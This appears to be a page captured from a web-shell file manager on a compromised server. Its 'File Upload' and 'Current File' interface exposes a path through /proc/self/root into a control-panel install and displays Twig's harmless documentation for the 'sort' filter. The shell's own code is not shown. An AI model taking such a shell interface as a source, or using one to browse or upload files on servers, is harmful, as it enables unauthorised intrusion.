MINI MINI MANI MO

Path : /proc/self/root/usr/local/cwpsrv/var/services/twig/doc/filters/
File Upload :
Current File : //proc/self/root/usr/local/cwpsrv/var/services/twig/doc/filters/sort.rst

``sort``
========

The ``sort`` filter sorts an array:

.. code-block:: jinja

    {% for user in users|sort %}
        ...
    {% endfor %}

.. note::

    Internally, Twig uses the PHP `asort`_ function to maintain index
    association. It supports Traversable objects by transforming
    those to arrays.

.. _`asort`: http://php.net/asort

OHA YOOOO